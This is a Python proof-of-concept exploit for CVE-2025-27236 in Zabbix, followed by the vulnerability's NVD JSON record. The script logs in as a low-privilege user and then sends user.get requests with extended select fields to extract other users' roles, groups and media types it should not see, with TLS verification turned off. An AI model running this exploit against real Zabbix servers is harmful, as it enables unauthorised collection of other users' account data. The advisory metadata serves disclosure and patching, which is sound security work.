CVE-2025-27236

# CVE-2025-27236 PoC - Zabbix API Unauthorized Field Access # This PoC demonstrates how a regular Zabbix user can access # fields they are not authorized to view via the user.get API method. import requests import json # Zabbix server configuration ZABBIX_URL = "https://zabbix-server.example.com/api_jsonrpc.php" USERNAME = "regular_user" PASSWORD = "user_password" # Step 1: Authenticate and obtain API token auth_payload = { "jsonrpc": "2.0", "method": "user.login", "params": { "username": USERNAME, "password": PASSWORD }, "id": 1 } response = requests.post(ZABBIX_URL, json=auth_payload, verify=False) auth_token = response.json().get("result") print(f"[+] Obtained auth token: {auth_token}") # Step 2: Exploit - Search users with unauthorized fields via select parameter # The vulnerability allows selecting fields the user does not have access to view exploit_payload = { "jsonrpc": "2.0", "method": "user.get", "params": { "output": ["userid", "username", "name", "surname"], # Select sensitive fields that the user should not have access to "selectRole": "extend", "selectMediatypes": "extend", "selectUsrgrps": "extend", "selectProvisioned": "extend" }, "auth": auth_token, "id": 2 } response = requests.post(ZABBIX_URL, json=exploit_payload, verify=False) result = response.json() # Step 3: Extract sensitive data from response if "result" in result: print("[+] Sensitive user data obtained via unauthorized field access:") for user in result["result"]: print(f"\nUser: {user.get('username')}") print(f" Role: {user.get('role')}") print(f" User Groups: {user.get('usrgrps')}") print(f" Media Types: {user.get('mediatypes')}") # Additional sensitive fields that should not be accessible print(f" Full Data: {json.dumps(user, indent=2)}") else: print(f"[-] Error: {result.get('error')}")

{"cve": {"id": "CVE-2025-27236", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:43.790", "lastModified": "2025-10-08T14:54:42.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A regular Zabbix user can search other users in their user group via Zabbix API by select fields the user does not have access to view. This allows data-mining some field values the user does not have access to."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.38", "versionEndExcluding": "6.0.41", "matchCriteriaId": "9C73E57A-771E-49D7-9D49-D46513A76D71"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.9", "versionEndExcluding": "7.0.17", "matchCriteriaId": "6A20277F-9A7E-410F-86F0-9E591E1E9089"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.3", "versionEndExcluding": "7.2.11", "matchCriteriaId": "01B49CD8-1065-4774-BDC7-3BF9644039E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:7.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "8AC63758-0D3C-47D2-8895-2C973E10BEE3"}]}]}], "references": [{"url": "https://support.zabbix.com/browse/ZBX-27060", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}